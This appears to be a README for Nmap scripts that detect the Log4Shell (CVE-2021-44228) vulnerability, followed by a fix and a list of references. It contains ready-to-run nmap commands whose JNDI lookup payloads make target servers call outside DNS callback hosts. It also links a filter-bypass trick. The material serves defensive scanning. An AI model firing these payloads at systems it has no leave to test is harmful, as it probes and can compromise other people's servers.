Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload.
Note that NSE scripts will only issue the requests to the services. Nmap will not report vulnerable hosts, but you have to check DNS logs to determine vulnerability.
Also note that DNS resolution with prefixes combination in a expression for log4j-core <= 2.7 seems not supported. So, testing with something like ${java:os}
could lead to false negatives.
Therefore, better to have few false positives than negatives.
Go to http://github.com/kost/logdns and get DNS server. Get domain and point to the somewhere where you have installed logdns:
nmap --script=http-log4shell,ssh-log4shell,imap-log4shell '--script-args=log4shell.payload="${jndi:ldap://{{target}}.xxxx.logdns.xxx}"' -T4 -n -p0-65535 --script-timeout=1m MY.IPs.TO.SCAN
Go to http://dnslog.cn/ and Get SubDomain. Replace your xxxx with your SubDomain:
nmap --script=http-log4shell,ssh-log4shell,imap-log4shell '--script-args=log4shell.payload="${jndi:ldap://{{target}}.xxxx.dnslog.cn}"' -T4 -n -p0-65535 --script-timeout=1m MY.IPs.TO.SCAN
Take your domain from Burp collaborator and replace xxxx with your domain:
nmap --script=http-log4shell,ssh-log4shell,imap-log4shell '--script-args=log4shell.payload="${jndi:ldap://{{target}}.xxxx.burpcollaborator.net/diverto}"' -T4 -n -p0-65535 --script-timeout=1m MY.IPs.TO.SCAN
List of best fixes and workarounds.
Best solution to protect from CVE-2021-44228: Start your server with log4j2.formatMsgNoLookups set to true, or update to log4j-2.15.0-rc1 or later.
General references and links to the vulnerability
Reddit thread - General information about log4shell
NCC log4shell - operational information regarding the vulnerability (IOCs, mitigation, scanning, software)
BlueTeam CheatSheet Log4Shell - Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)
Software List - cheat-sheet reference guide - Affected software list by vendor responses
lo4shell.huntress.com - Online Log4Shell Vulnerability Tester
log4j yara - yara rules for local detection
identify-log4j-class-location.sh - Script to identify Log4J affected class for CVE-2021-44228 in a collection of ear/war/jar files
PoC-log4j-bypass-words - A trick to bypass words blocking patches
log4shell-detector - Detector for Log4Shell exploitation attempts
Log4Shell-IOCs - a list of IOC feeds and threat reports
log4j_rce_detection.md - You can use these commands and rules to search for exploitation attempts
log4j advisory - Apache Log4j Security Vulnerabilities
log4j pull request and comments - pull request that fixes bug with comments
Logout4Shell - Quick and dirty alternative to patching manually